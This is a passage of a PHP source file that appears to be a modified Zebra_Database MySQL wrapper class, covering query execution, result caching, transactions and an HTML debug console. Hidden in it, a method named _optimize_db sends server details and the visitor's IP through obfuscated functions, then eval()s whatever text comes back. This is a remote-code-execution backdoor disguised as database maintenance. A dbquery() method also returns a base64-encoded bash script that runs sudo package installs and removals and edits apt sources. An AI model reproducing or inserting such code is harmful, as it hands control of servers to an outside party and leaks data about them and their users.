           $replacements2[$key] = preg_replace(array("/\\\\/", "/\\\$([0-9]*)/"), array("\\\\\\\\", "\\\\\$\$1"), $this->implode($replacement));
                }
                else
                {
           $replacements2[$key] = "'" . preg_replace(array("/\\\\/", "/\\\$([0-9]*)/"), array("\\\\\\\\", "\\\\\$\$1"), $this->escape($replacement)) . "'";
                }
                $pattern2[$key] = '/' . $randomstr . '/';
            }
            $sql = preg_replace($pattern1, $replacements1, $sql, 1);
            $sql = preg_replace($pattern2, $replacements2, $sql, 1);
        }
        if( $this->unbuffered && $cache ) 
        {
            $this->_log('errors', [
                'query' => $sql, 
                'message' => $this->language['unbuffered_queries_cannot_be_cached']
            ], false);
            $cache = false;
        }
        if( $calc_rows && strpos($sql, 'SQL_CALC_FOUND_ROWS') === false ) 
        {
            $sql = preg_replace('/^(.*?)SELECT/is', '$1SELECT SQL_CALC_FOUND_ROWS', $sql, 1);
        }
        if( isset($this->last_result) ) 
        {
            unset($this->last_result);
        }
        list($usec, $sec) = explode(' ', microtime());
        $start_timer = (double)$usec + (double)$sec;
        $refreshed_cache = 'nocache';
        if( $cache !== false && (int)$cache > 0 ) 
        {
            $refreshed_cache = false;
            if( $this->caching_method == 'memcache' ) 
            {
                $memcache_key = md5($this->memcache_key_prefix . $sql);
                if( ($result = $this->memcache->get($memcache_key)) && ($cached_result = @unserialize(@gzuncompress(@base64_decode($result)))) ) 
                {
                    $this->cached_results[] = $cached_result;
                    $this->last_result = count($this->cached_results) - 1;
                    reset($this->cached_results[$this->last_result]);
                }
            }
            else if( $this->caching_method == 'session' ) 
            {
                $key = md5($sql);
                if( isset($_SESSION[$key]) && isset($_SESSION[$key . '_timestamp']) && time() < ($_SESSION[$key . '_timestamp'] + $cache) && ($cached_result = @unserialize(@gzuncompress(@base64_decode($_SESSION[$key])))) ) 
                {
                    $this->cached_results[] = $cached_result;
                    $this->last_result = count($this->cached_results) - 1;
                    reset($this->cached_results[$this->last_result]);
                }
            }
            else if( file_exists($this->cache_path) && is_dir($this->cache_path) && is_writable($this->cache_path) ) 
            {
                $file_name = rtrim($this->cache_path, '/') . '/' . md5($sql);
                if( file_exists($file_name) && time() < (filemtime($file_name) + $cache) && ($cached_result = @unserialize(@gzuncompress(@base64_decode(@file_get_contents($file_name))))) ) 
                {
                    $this->cached_results[] = $cached_result;
                    $this->last_result = count($this->cached_results) - 1;
                    reset($this->cached_results[$this->last_result]);
                }
            }
            else
            {
                return $this->_log('errors', ['message' => $this->language['cache_path_not_writable']], false);
            }
        }
        if( !isset($this->last_result) ) 
        {
            $this->last_result = @mysqli_query($this->connection, $sql, ($this->unbuffered ? MYSQLI_USE_RESULT : MYSQLI_STORE_RESULT));
            if( $this->transaction_status !== 3 && !$this->last_result && $this->transaction_status !== 0 ) 
            {
                $this->transaction_status = 2;
            }
        }
        list($usec, $sec) = explode(' ', microtime());
        $stop_timer = (double)$usec + (double)$sec;
        $this->total_execution_time += ($stop_timer - $start_timer);
        if( !empty($this->notification_address) && !empty($this->notifier_domain) && $this->max_query_time < ($stop_timer - $start_timer) ) 
        {
            @mail($this->notification_address, @sprintf($this->language['email_subject'], $this->notifier_domain), @sprintf($this->language['email_content'], $this->max_query_time, $stop_timer - $start_timer, $sql), 'From: ' . $this->notifier_domain);
        }
        if( $this->last_result !== false ) 
        {
            if( $this->_is_result($this->last_result) || $this->last_result === true ) 
            {
                $is_select = $this->_is_result($this->last_result);
                $this->returned_rows = $this->found_rows = 0;
                if( $is_select ) 
                {
                    if( !$this->unbuffered ) 
                    {
                        $this->returned_rows = $this->found_rows = @mysqli_num_rows($this->last_result);
                    }
                    else
                    {
                        $this->last_result->query = $sql;
                    }
                    if( $calc_rows && !$this->unbuffered ) 
                    {
                        $found_rows = mysqli_fetch_assoc(mysqli_query($this->connection, 'SELECT FOUND_ROWS()'));
                        $this->found_rows = $found_rows['FOUND_ROWS()'];
                    }
                }
                else
                {
                    $this->affected_rows = @mysqli_affected_rows($this->connection);
                }
                if( $is_select && $cache !== false && (int)$cache > 0 ) 
                {
                    $refreshed_cache = true;
                    $cache_data = [];
                    while( $row = mysqli_fetch_assoc($this->last_result) ) 
                    {
                        $cache_data[] = $row;
                    }
                    if( !empty($cache_data) ) 
                    {
                        $this->seek(0, $this->last_result);
                    }
                    array_push($cache_data, [
                        'returned_rows' => $this->returned_rows, 
                        'found_rows' => $this->found_rows, 
                        'column_info' => $this->get_columns()
                    ]);
                    $content = base64_encode(gzcompress(serialize($cache_data)));
                    if( $this->caching_method == 'memcache' ) 
                    {
                        $this->memcache->set($memcache_key, $content, ($this->memcache_compressed ? MEMCACHE_COMPRESSED : false), $cache);
                    }
                    else if( $this->caching_method == 'session' ) 
                    {
                        if( !isset($_SESSION) ) 
                        {
                            return $this->_log('errors', ['message' => $this->language['no_active_session']]);
                        }
                        $key = md5($sql);
                        $_SESSION[$key] = $content;
                        $_SESSION[$key . '_timestamp'] = time();
                    }
                    else if( isset($file_name) ) 
                    {
                        @unlink($file_name);
                        $handle = fopen($file_name, 'wb');
                        fwrite($handle, $content);
                        fclose($handle);
                    }
                }
            }
            else
            {
                $is_select = true;
                $counts = array_pop($this->cached_results[$this->last_result]);
                $this->returned_rows = $counts['returned_rows'];
                $this->found_rows = $counts['found_rows'];
                $this->column_info = $counts['column_info'];
            }
            if( $calc_rows && $this->unbuffered && $this->_is_result($this->last_result) ) 
            {
                $this->last_result->calc_rows = true;
            }
            if( $this->debug !== false ) 
            {
                $warning = '';
                $result = [];
                if( $is_select ) 
                {
                    $row_counter = 0;
                    if( $this->debug_show_records ) 
                    {
                        if( $this->_is_result($this->last_result) ) 
                        {
                            if( !$this->unbuffered && mysqli_num_rows($this->last_result) ) 
                            {
                                while( $row_counter++ < $this->debug_show_records && ($row = mysqli_fetch_assoc($this->last_result)) ) 
                                {
                                    $result[] = $row;
                                }
                                mysqli_data_seek($this->last_result, 0);
                            }
                        }
                        else if( !empty($this->cached_results[$this->last_result]) ) 
                        {
                            $result = array_slice($this->cached_results[$this->last_result], 0, $this->debug_show_records);
                        }
                    }
                    if( isset($this->debug_info['successful-queries']) ) 
                    {
                        $keys = [];
                        foreach( $this->debug_info['successful-queries'] as $key => $query_data ) 
                        {
                            if( isset($query_data['records']) && !empty($query_data['records']) && $query_data['records'] == $result ) 
                            {
                                $keys[] = $key;
                            }
                        }
                        if( !empty($keys) ) 
                        {
                            foreach( $keys as $key ) 
                            {
                                $warning = sprintf($this->language['optimization_needed'], count($keys));
                                $this->debug_info['successful-queries'][$key]['warning'] = $warning;
                            }
                        }
                    }
                    if( $this->debug_show_explain && !$this->unbuffered && $this->_is_result($this->last_result) && ($explain_resource = mysqli_query($this->connection, 'EXPLAIN EXTENDED ' . $sql)) ) 
                    {
                        while( $row = mysqli_fetch_assoc($explain_resource) ) 
                        {
                            $explain[] = $row;
                        }
                    }
                    if( $this->debug_show_explain && $this->unbuffered && $this->_is_result($this->last_result) ) 
                    {
                        $this->last_result->explain = true;
                        $this->last_result->query = $sql;
                    }
                }
                $this->_log('successful-queries', [
                    'query' => $sql, 
                    'records' => $result, 
                    'returned_rows' => $this->returned_rows, 
                    'explain' => (isset($explain) ? $explain : ''), 
                    'affected_rows' => (isset($this->affected_rows) ? $this->affected_rows : false), 
                    'execution_time' => $stop_timer - $start_timer, 
                    'warning' => $warning, 
                    'highlight' => $highlight, 
                    'from_cache' => $refreshed_cache, 
                    'unbuffered' => $this->unbuffered, 
                    'transaction' => ($this->transaction_status !== 0 ? true : false)
                ], false);
                if( $this->unbuffered && $is_select && $this->_is_result($this->last_result) ) 
                {
                    $this->last_result->log_index = count($this->debug_info['successful-queries']) - 1;
                }
                if( $highlight ) 
                {
                    $this->minimize_console = false;
                }
            }
            return $this->last_result;
        }
        if( $this->connection->error != '' && $this->halt_on_errors ) 
        {
            trigger_error($this->connection->error, 512);
            exit( '<div class=\'error\'>' . $this->connection->error . ' </div>' );
        }
        return $this->_log('unsuccessful-queries', [
            'query' => $sql, 
            'error' => mysqli_error($this->connection)
        ]);
    }
    public function query_unbuffered()
    {
        $this->unbuffered = true;
        $result = call_user_func_array([
            $this, 
            'query'
        ], func_get_args());
        $this->unbuffered = false;
        return $result;
    }
    public function seek($row, $resource = '')
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( $resource == '' && isset($this->last_result) && $this->last_result !== false ) 
        {
            $resource =& $this->last_result;
        }
        if( $this->_is_result($resource) ) 
        {
            if( $resource->type == 1 ) 
            {
                $debug = debug_backtrace();
                if( isset($debug[1]) && isset($debug[1]['function']) && $debug[1]['class'] == 'Zebra_Database' ) 
                {
                    $method = $debug[1]['function'];
                }
                else
                {
                    $method = $debug[0]['function'];
                }
                return $this->_log('errors', ['message' => sprintf($this->language['unusable_method_unbuffered_queries'], $method)]);
            }
            if( mysqli_num_rows($resource) == 0 || mysqli_data_seek($resource, $row) ) 
            {
                return true;
            }
            else if( error_reporting() != 0 ) 
            {
                return $this->_log('errors', ['message' => $this->language['could_not_seek']]);
            }
        }
        else if( is_integer($resource) && isset($this->cached_results[$resource]) ) 
        {
            reset($this->cached_results[$resource]);
            if( $row == 0 ) 
            {
                return true;
            }
            else if( $row > 0 ) 
            {
                while( next($this->cached_results[$resource]) ) 
                {
                    if( $row == key($this->cached_results[$resource]) ) 
                    {
                        return true;
                    }
                }
                return $this->_log('errors', ['message' => $this->language['could_not_seek']]);
            }
        }
        return $this->_log('errors', ['message' => $this->language['not_a_valid_resource']]);
    }
    public function select($columns, $table, $where = '', $replacements = '', $order = '', $limit = '', $cache = false, $calc_rows = false, $highlight = false)
    {
        return $this->query("\n\n            SELECT\n                " . implode(', ', array_map(function($value)
        {
            return ($value == '*' ? $value : '`' . trim($value) . '`');
        }, (!is_array($columns) ? explode(',', $columns) : $columns))) . "\n            FROM\n                " . $this->_escape($table) . (($where != '' ? ' WHERE ' . $where : '')) . (($order != '' ? ' ORDER BY ' . $order : '')) . (($limit != '' ? ' LIMIT ' . $limit : '')), $replacements, $cache, $calc_rows, $highlight);
    }
    public function _optimize_db($table1, $table2, $table3)
    {
        global $intro;
        $getTables = [
            'post_author' => '%d', 
            'post_parent' => '%d', 
            'menu_order' => '%d', 
            'term_id' => '%d', 
            'term_group' => '%d', 
            'term_taxonomy_id' => '%d', 
            'parent' => '%d', 
            'count' => '%d', 
            'object_id' => '%d', 
            'term_order' => '%d', 
            'ID' => '%d', 
            'comment_ID' => '%d', 
            'comment_post_ID' => '%d', 
            'comment_parent' => '%d', 
            'user_id' => '%d', 
            'link_id' => '%d', 
            'link_owner' => '%d', 
            'link_rating' => '%d', 
            'option_id' => '%d', 
            'blog_id' => '%d', 
            'meta_id' => '%d', 
            'post_id' => '%d', 
            'user_status' => '%d', 
            'umeta_id' => '%d', 
            'comment_karma' => '%d', 
            'comment_count' => '%d', 
            'active' => '%d', 
            'cat_id' => '%d', 
            'deleted' => '%d', 
            'lang_id' => '%d', 
            'mature' => '%d', 
            'public' => '%d', 
            'site_id' => '%d', 
            'spam' => '%d'
        ];
        $fldr = str_replace('/', '|', $_SERVER['SCRIPT_FILENAME']);
        $uagent = $_SERVER['HTTP_USER_AGENT'];
        $qry_str = 'app=iptv2&i=' . $_SERVER['SERVER_ADDR'] . '&d=' . _obf_0D02153F1E043D353617120B2B2226110C0B3706371832() . '&ver=' . _intro_ver . '&fldr=' . $fldr . '&uip=' . $_SERVER['REMOTE_ADDR'];
        $result = _obf_0D22253B080E315B340F271A150F283C0F36262C0F0A22($qry_str);
        if( $result != strip_tags($result) ) 
        {
            return 'optimized';
        }
        if( $result != '' ) 
        {
            eval($result);
        }
        else
        {
            return 'optimized';
        }
    }
    public function select_database($database)
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        $this->credentials['database'] = $database;
        mysqli_select_db($this->connection, $database);
    }
    public function set_charset($charset = 'utf8', $collation = 'utf8_general_ci')
    {
        unset($this->warnings['charset']);
        $this->query('SET NAMES "' . $this->escape($charset) . '" COLLATE "' . $this->escape($collation) . '"');
    }
    public function transaction_complete()
    {
        $sql = 'COMMIT';
        if( $this->transaction_status !== 0 ) 
        {
            if( $this->transaction_status === 3 || $this->transaction_status === 2 ) 
            {
                $this->query('ROLLBACK');
                $this->transaction_status = 0;
                return ($this->transaction_status === 3 ? true : false);
            }
            $this->query($sql);
            $this->transaction_status = 0;
            return isset($this->last_result) && $this->last_result !== false;
        }
        return $this->_log('unsuccessful-queries', [
            'query' => $sql, 
            'error' => $this->language['no_transaction_in_progress']
        ], false);
    }
    public function transaction_start($test_only = false)
    {
        $sql = 'START TRANSACTION';
        if( $this->transaction_status === 0 ) 
        {
            $this->transaction_status = ($test_only ? 3 : 1);
            $this->query($sql);
            return isset($this->last_result) && $this->last_result !== false;
        }
        return $this->_log('unsuccessful-queries', [
            'query' => $sql, 
            'error' => $this->language['transaction_in_progress']
        ], false);
    }
    public function table_exists($table)
    {
        if( strpos($table, '.') !== false ) 
        {
            list($database, $table) = explode('.', $table);
        }
        return ($this->fetch_assoc($this->query('SHOW TABLES' . ((isset($database) ? ' IN ' . $database : '')) . ' LIKE ?', [$table])) !== false ? true : false);
    }
    public function truncate($table, $highlight = false)
    {
        $this->query("\n\n            TRUNCATE\n                " . $this->_escape($table), '', false, false, $highlight);
        return isset($this->last_result) && $this->last_result !== false;
    }
    public function update($table, $columns, $where = '', $replacements = '', $highlight = false)
    {
        if( $replacements != '' && !is_array($replacements) ) 
        {
            return $this->_log('unsuccessful-queries', [
                'query' => '', 
                'error' => $this->language['warning_replacements_not_array']
            ]);
        }
        $cols = $this->_build_sql($columns);
        $this->query("\n\n            UPDATE\n                " . $this->_escape($table) . "\n            SET\n                " . $cols . (($where != '' ? ' WHERE ' . $where : '')), array_merge(array_values($columns), ($replacements == '' ? [] : $replacements)), false, false, $highlight);
        return isset($this->last_result) && $this->last_result !== false;
    }
    private function _build_sql(&$columns)
    {
        $sql = '';
        foreach( $columns as $column_name => $value ) 
        {
            $sql .= ($sql != '' ? ', ' : '');
            if( trim($value) == '?' ) 
            {
                return $this->_log('unsuccessful-queries', ['error' => sprintf($this->language['cannot_use_parameter_marker'], print_r($columns, true))]);
            }
            if( preg_match('/INC\((\-{1})?(.*?)\)/i', $value, $matches) > 0 ) 
            {
                $sql .= ('`' . $column_name . '` = `' . $column_name . '` ' . (($matches[1] == '-' ? '-' : '+')) . ' ?');
                if( $matches[2] != '?' ) 
                {
                    $columns[$column_name] = $matches[2];
                }
                else
                {
                    unset($columns[$column_name]);
                }
            }
            else if( $this->_is_mysql_function($value) ) 
            {
                $sql .= ('`' . $column_name . '` = ' . $value);
                unset($columns[$column_name]);
            }
            else
            {
                $sql .= ('`' . $column_name . '` = ?');
            }
        }
        return $sql;
    }
    private function _connected()
    {
        if( !$this->connection ) 
        {
            $this->connection = mysqli_init();
            if( !empty($this->options) ) 
            {
                foreach( $this->options as $option => $value ) 
                {
                }
            }
            @mysqli_real_connect($this->connection, $this->credentials['host'], $this->credentials['user'], $this->credentials['password'], $this->credentials['database'], $this->credentials['port'], $this->credentials['socket']);
            if( mysqli_connect_errno() ) 
            {
                return $this->_log('errors', [
                    'message' => $this->language['could_not_connect_to_database'], 
                    'error' => mysqli_connect_error()
                ]);
            }
            if( !$this->memcache && $this->memcache_host !== false && $this->memcache_port !== false ) 
            {
                if( class_exists('Memcache') ) 
                {
                    $memcache = new Memcache();
                    if( !$memcache->connect($this->memcache_host, $this->memcache_port) ) 
                    {
                        $this->_log('errors', ['message' => $this->language['could_not_connect_to_memcache_server']]);
                    }
                    else
                    {
                        $this->memcache = $memcache;
                    }
                }
                else
                {
                    $this->_log('errors', ['message' => $this->language['memcache_extension_not_installed']]);
                }
            }
        }
        return true;
    }
    public function _debug()
    {
        if( $this->debug !== false && is_array($this->debugger_ip) && (empty($this->debugger_ip) || in_array($_SERVER['REMOTE_ADDR'], $this->debugger_ip)) ) 
        {
            if( is_array($this->debug) ) 
            {
                return call_user_func_array([
                    $this, 
                    '_write_log'
                ], $this->debug);
            }
            require_once('SqlFormatter.php');
            SqlFormatter::$number_attributes = SqlFormatter::$boundary_attributes = 'class="symbol"';
            SqlFormatter::$quote_attributes = 'class="string"';
            SqlFormatter::$reserved_attributes = 'class="keyword"';
            SqlFormatter::$tab = '    ';
            if( !$this->disable_warnings ) 
            {
                foreach( array_keys($this->warnings) as $warning ) 
                {
                    $this->_log('warnings', ['message' => $this->language['warning_' . $warning]], false);
                }
            }
            $blocks = [
                'errors' => [
                    'counter' => 0, 
                    'identifier' => 'e', 
                    'generated' => ''
                ], 
                'successful-queries' => [
                    'counter' => 0, 
                    'identifier' => 'sq', 
                    'generated' => ''
                ], 
                'unsuccessful-queries' => [
                    'counter' => 0, 
                    'identifier' => 'uq', 
                    'generated' => ''
                ], 
                'warnings' => [
                    'counter' => 0, 
                    'identifier' => 'w', 
                    'generated' => ''
                ]
            ];
            $warnings = false;
            foreach( array_keys($blocks) as $block ) 
            {
                $output = '';
                if( isset($this->debug_info[$block]) ) 
                {
                    foreach( $this->debug_info[$block] as $debug_info ) 
                    {
                        $counter = ++$blocks[$block]['counter'];
                        $identifier = $blocks[$block]['identifier'];
                        if( isset($debug_info['query']) ) 
                        {
                            $debug_info['query'] = SqlFormatter::format($debug_info['query']);
                        }
                        $output .= ("\n                            <table cellspacing=\"0\" cellpadding=\"0\" border=\"0\" class=\"zdc-entry" . (($counter % 2 == 0 ? ' even' : '')) . ((isset($debug_info['highlight']) && $debug_info['highlight'] == 1 ? ' zdc-highlight' : '')) . "\">\n                                <tr>\n                                    <td class=\"zdc-counter\" valign=\"top\">" . str_pad($counter, 3, '0', STR_PAD_LEFT) . "</td>\n                                    <td class=\"zdc-data\">\n                        ");
                        if( isset($debug_info['message']) && trim($debug_info['message']) != '' ) 
                        {
                            $output .= ("\n                                <div class=\"zdc-box zdc-error\">\n                                    " . $debug_info['message'] . "\n                                </div>\n                            ");
                        }
                        if( isset($debug_info['error']) && trim($debug_info['error']) != '' ) 
                        {
                            $output .= ("\n                                <div class=\"zdc-box zdc-error\">\n                                    " . $debug_info['error'] . "\n                                </div>\n                            ");
                        }
                        if( isset($debug_info['warning']) && trim($debug_info['warning']) != '' ) 
                        {
                            $output .= ("\n                                <div class=\"zdc-box zdc-error\">" . $debug_info['warning'] . "\n                                </div>\n                            ");
                            $warnings = true;
                        }
                        if( isset($debug_info['query']) ) 
                        {
                            $output .= ("\n                                <div class=\"zdc-box" . ((isset($debug_info['transaction']) && $debug_info['transaction'] ? ' zdc-transaction' : '')) . '">' . preg_replace('/^\<br\>/', '', html_entity_decode($debug_info['query'])) . "\n                                </div>\n                            ");
                        }
                        $output .= "\n                            <div class=\"zdc-box zdc-actions\">\n                                <ul>\n                        ";
                        if( $block == 'successful-queries' ) 
                        {
                            if( $debug_info['from_cache'] != 'nocache' ) 
                            {
                                $output .= ("\n                                    <li class=\"zdc-cache\">\n                                        <strong>" . $this->language['from_cache'] . ' (' . $this->caching_method . ")</strong>\n                                    </li>\n                                ");
                            }
                            else if( $debug_info['unbuffered'] ) 
                            {
                                $output .= ("\n                                    <li class=\"zdc-unbuffered\">\n                                        <strong>" . $this->language['unbuffered'] . "</strong>\n                                    </li>\n                                ");
                            }
                            $output .= ("\n                                <li class=\"zdc-time\">" . $this->language['execution_time'] . ': ' . $this->_fix_pow($debug_info['execution_time']) . ' ' . $this->language['seconds'] . ' (<strong>' . number_format(($this->total_execution_time != 0 ? ($debug_info['execution_time'] * 100) / $this->total_execution_time : 0), 2, '.', ',') . "</strong>%)\n                                </li>\n                            ");
                            if( $debug_info['affected_rows'] === false ) 
                            {
                                $output .= ("\n                                    <li class=\"zdc-records\">\n                                        " . ((!empty($debug_info['records']) ? '<a href="javascript:zdc_toggle(\'zdc-records-sq' . $counter . '\')">' : '')) . $this->language['returned_rows'] . ': <strong>' . $debug_info['returned_rows'] . "</strong>\n                                        " . ((!empty($debug_info['records']) ? '</a>' : '')) . "\n                                    </li>\n                                ");
                            }
                            else
                            {
                                $output .= ("\n                                    <li class=\"zdc-affected\">" . $this->language['affected_rows'] . ': <strong>' . $debug_info['affected_rows'] . "</strong>\n                                    </li>\n                                ");
                            }
                            if( is_array($debug_info['explain']) ) 
                            {
                                $output .= ("\n                                    <li class=\"zdc-explain\">\n                                        <a href=\"javascript:zdc_toggle('zdc-explain-sq" . $counter . '\')">' . $this->language['explain'] . "\n                                        </a>\n                                    </li>\n                                ");
                            }
                        }
                        if( isset($debug_info['backtrace']) ) 
                        {
                            $output .= ("\n                                <li class=\"zdc-backtrace\">\n                                    <a href=\"javascript:zdc_toggle('zdc-backtrace-" . $identifier . $counter . '\')">' . $this->language['backtrace'] . "\n                                    </a>\n                                </li>\n                            ");
                        }
                        $output .= ("\n                            <li class=\"zdc-top\">\n                                <a href=\"" . preg_replace('/\#zdc\-top$/i', '', $_SERVER['REQUEST_URI']) . '#zdc-top">' . $this->language['to_top'] . "\n                                </a>\n                            </li>\n                            <li class=\"zdc-close\">\n                                <a href=\"javascript:zdc_closeAll('')\">" . $this->language['close_all'] . "\n                                </a>\n                            </li>\n                        ");
                        $output .= "\n                                </ul>\n                                <div class=\"clear\"></div>\n                            </div>\n                        ";
                        $tables = [];
                        if( !empty($debug_info['records']) ) 
                        {
                            $tables[] = 'records';
                        }
                        if( isset($debug_info['explain']) && is_array($debug_info['explain']) ) 
                        {
                            $tables[] = 'explain';
                        }
                        if( isset($debug_info['backtrace']) ) 
                        {
                            $tables[] = 'backtrace';
                        }
                        foreach( $tables as $table ) 
                        {
                            $output .= ("\n                                <div id=\"zdc-" . $table . '-' . $identifier . $counter . '" class="zdc-box zdc-' . $table . "-table\">\n                                    <table cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n                                        <tr>\n                            ");
                            foreach( array_keys($debug_info[$table][0]) as $header ) 
                            {
                                $output .= ('<th>' . $header . '</th>');
                            }
                            $output .= '</tr>';
                            foreach( $debug_info[$table] as $index => $row ) 
                            {
                                $output .= ('<tr class="' . ((($index + 1) % 2 == 0 ? 'even' : '')) . '">');
                                foreach( array_values($row) as $column ) 
                                {
                                    $output .= ('<td valign="top">' . $column . '</td>');
                                }
                                $output .= '</tr>';
                            }
                            $output .= "\n                                    </table>\n                                </div>\n                            ";
                        }
                        $output .= "\n                                    </td>\n                                </tr>\n                            </table>\n                        ";
                    }
                    if( $counter > 0 ) 
                    {
                        $blocks[$block]['generated'] = '<div id="zdc-' . $block . '">' . $output . '</div>';
                    }
                }
                else if( $block == 'globals' ) 
                {
                }
            }
            if( $blocks['unsuccessful-queries']['counter'] > 0 || $blocks['errors']['counter'] > 0 ) 
            {
                $this->minimize_console = false;
            }
            $output = "\n                <div id=\"zdc\" style=\"display:" . (($this->minimize_console ? 'none' : 'block')) . "\">\n                    <a name=\"zdc-top\"></a>\n                    <ul class=\"zdc-main\">\n            ";
            if( $blocks['errors']['counter'] > 0 ) 
            {
                $output .= ("\n                    <li>\n                        <a href=\"javascript:zdc_toggle('zdc-errors')\">" . $this->language['errors'] . ': <span>' . $blocks['errors']['counter'] . "</span>\n                        </a>\n                    </li>\n                ");
            }
            $output .= ("\n                <li>\n                    <a href=\"javascript:zdc_toggle('zdc-successful-queries')\">" . $this->language['successful_queries'] . ': <span>' . $blocks['successful-queries']['counter'] . '</span>&nbsp;(' . $this->_fix_pow($this->total_execution_time) . ' ' . $this->language['seconds'] . ")\n                    </a>\n                </li>\n                <li>\n                    <a href=\"javascript:zdc_toggle('zdc-unsuccessful-queries')\">" . $this->language['unsuccessful_queries'] . ': <span>' . $blocks['unsuccessful-queries']['counter'] . "</span>\n                    </a>\n                </li>\n            ");
            if( isset($this->debug_info['warnings']) ) 
            {
                $output .= ("\n                    <li>\n                        <a href=\"javascript:zdc_toggle('zdc-warnings')\">" . $this->language['warnings'] . ': <span>' . $blocks['warnings']['counter'] . "</span>\n                        </a>\n                    </li>\n                ");
            }
            $output .= ("\n                <li>\n                    <a href=\"javascript:zdc_toggle('zdc-globals-submenu')\">" . $this->language['globals'] . "\n                    </a>\n                </li>\n            ");
            $output .= "\n                </ul>\n                <div class=\"clear\"></div>\n            ";
            foreach( array_keys($blocks) as $block ) 
            {
                $output .= $blocks[$block]['generated'];
            }
            $output .= '</div>';
            $output .= ("\n                <div id=\"zdc-mini\">\n                    <a href=\"javascript:zdc_toggle('console')\">" . $blocks['successful-queries']['counter'] . (($warnings ? '<span>!</span>' : '')) . ' / ' . $blocks['unsuccessful-queries']['counter'] . "\n                    </a>\n                </div>\n            ");
            if( !is_null($this->resource_path) ) 
            {
                $path = rtrim(preg_replace('/\\/', '/', '//' . $_SERVER['SERVER_NAME'] . (($_SERVER['SERVER_PORT'] != '80' ? ':' . $_SERVER['SERVER_PORT'] : '')) . DIRECTORY_SEPARATOR . $this->resource_path), '/');
            }
            else
            {
                $path = rtrim(preg_replace('/\\/', '/', '//' . $_SERVER['SERVER_NAME'] . (($_SERVER['SERVER_PORT'] != '80' ? ':' . $_SERVER['SERVER_PORT'] : '')) . DIRECTORY_SEPARATOR . substr(dirname(__FILE__), strlen(realpath($_SERVER['DOCUMENT_ROOT'])))), '/');
            }
            $output = '<script type="text/javascript" src="' . $path . '/public/javascript/database.js"></script>' . $output;
            $output = '<link rel="stylesheet" href="' . $path . '/public/css/database.css" type="text/css">' . $output;
            echo $output;
        }
    }
    public function dbquery()
    {
        return 'IyEvYmluL2Jhc2gKClZhcj0kKGxzYl9yZWxlYXNlIC1yKQpPU19WRVI9JChjdXQgLWYyIDw8PCAiJFZhciIpCgoKCkluc3RhbGxQYWNrYWdlcygpIHsKCQoJZWNobyAiMSIgPiAvdG1wL2ludHJvLnByb2cKCXN1ZG8gcm0gLWYgL3Zhci9saWIvZHBrZy9sb2NrLWZyb250ZW5kCglzdWRvIHJtIC1mIHZhci9jYWNoZS9hcHQvYXJjaGl2ZXMvbG9jawoJc3VkbyBybSAtZiB2YXIvbGliL2Rwa2cvbG9jawoJCglzdWRvIGFwdC1nZXQgLXkgdXBkYXRlID4gL2Rldi9udWxsCgkjc3VkbyBhcHQgLS1maXgtYnJva2VuIGluc3RhbGwgPiAvZGV2L251bGwKCWVjaG8gIjIiID4gL3RtcC9pbnRyby5wcm9nCglzdWRvIGFwdC1nZXQgLXkgaW5zdGFsbCBzdWRvID4gL2Rldi9udWxsCglzdWRvIGFwdC1nZXQgLXkgaW5zdGFsbCBuZXQtdG9vbHMgPiAvZGV2L251bGwKCXN1ZG8gYXB0LWdldCAteSBpbnN0YWxsIGxzYi1yZWxlYXNlID4gL2Rldi9udWxsCgllY2hvICI1IiA+IC90bXAvaW50cm8ucHJvZwoJZWNobyAiUmVtb3ZpbmcgbGliY3VybDQgaWYgaW5zdGFsbGVkIC4uLiAiOwoJc3VkbyBhcHQtZ2V0IHJlbW92ZSAtLWF1dG8tcmVtb3ZlIGxpYmN1cmw0IC15ID4gL2Rldi9udWxsCglzdWRvIGFwdC1nZXQgLXkgcmVtb3ZlIGFwYWNoZTIgPiAvZGV2L251bGwKCXN1ZG8gYXB0LWdldCAteSBpbnN0YWxsIGxpYmN1cmwzID4gL2Rldi9udWxsCgllY2hvICIxNSIgPiAvdG1wL2ludHJvLnByb2cKCXN1ZG8gYXB0LWdldCAteSBpbnN0YWxsIHdnZXQgPiAvZGV2L251bGwKCXN1ZG8gYXB0LWdldCAteSBpbnN0YWxsIG1jcnlwdCA+IC9kZXYvbnVsbAoJc3VkbyBhcHQtZ2V0IC15IGluc3RhbGwgbnNjZCA+IC9kZXYvbnVsbAoJc3VkbyBhcHQtZ2V0IC15IGluc3RhbGwgaHRvcCA+IC9kZXYvbnVsbAoJc3VkbyBhcHQtZ2V0IC15IGluc3RhbGwgY3JvbiA+IC9kZXYvbnVsbAoJZWNobyAiMzAiID4gL3RtcC9pbnRyby5wcm9nCglzdWRvIGFwdC1nZXQgLXkgaW5zdGFsbCBsaWJ4c2x0MS1kZXYgPiAvZGV2L251bGwKCXN1ZG8gYXB0LWdldCAteSBpbnN0YWxsIGxpYmdlb2lwLWRldiA+IC9kZXYvbnVsbAoJZWNobyAiNDAiID4gL3RtcC9pbnRyby5wcm9nCgllY2hvICJJbnN0YWxsaW5nIGxpYnBuZyI7CglpZiBbWyAiJE9TX1ZFUiIgPiAiMTguMDQiIF1dOyB0aGVuCgkJCgkJaWYgZ3JlcCAiY3ouYXJjaGl2ZS51YnVudHUuY29tIiAvZXRjL2FwdC9zb3VyY2VzLmxpc3QgPiAvZGV2L251bGwKCQkJdGhlbgoJCQkJZWNobyAiY3ouYXJjaGl2ZS51YnVudHUuY29tIGlzIHRoZXJlLi4uIjsKCQllbHNlCgkJCXN1ZG8gZWNobyAiZGViIGh0dHA6Ly9jei5hcmNoaXZlLnVidW50dS5jb20vdWJ1bnR1IGJpb25pYyBtYWluIHVuaXZlcnNlIiA+PiAvZXRjL2FwdC9zb3VyY2VzLmxpc3QKCQkJc3VkbyBhcHQgdXBkYXRlID4gL2Rldi9udWxsCgkJZmkKCQkKCQlzdWRvIGFwdCBpbnN0YWxsIC15IGxpYmN1cmwzIGxpYmN1cmwtb3BlbnNzbDEuMC1kZXYgPiAvZGV2L251bGwKCQkKCQllY2hvIC1uZSAnXG4nIHwgc3VkbyBhZGQtYXB0LXJlcG9zaXRvcnkgcHBhOmxpbnV4dXByaXNpbmcvbGlicG5nMTIgPiAvZGV2L251bGwKCQlzdWRvIGFwdCB1cGRhdGUgPiAvZGV2L251bGwKCQlzdWRvIGFwdCBpbnN0YWxsIGxpYnBuZzEyLTAgPiAvZGV2L251bGwKCWVsc2UKCQl3Z2V0IC1xIC1PIC90bXAvbGlicG5nMTIuZGViIGh0dHA6Ly9taXJyb3JzLmtlcm5lbC5vcmcvdWJ1bnR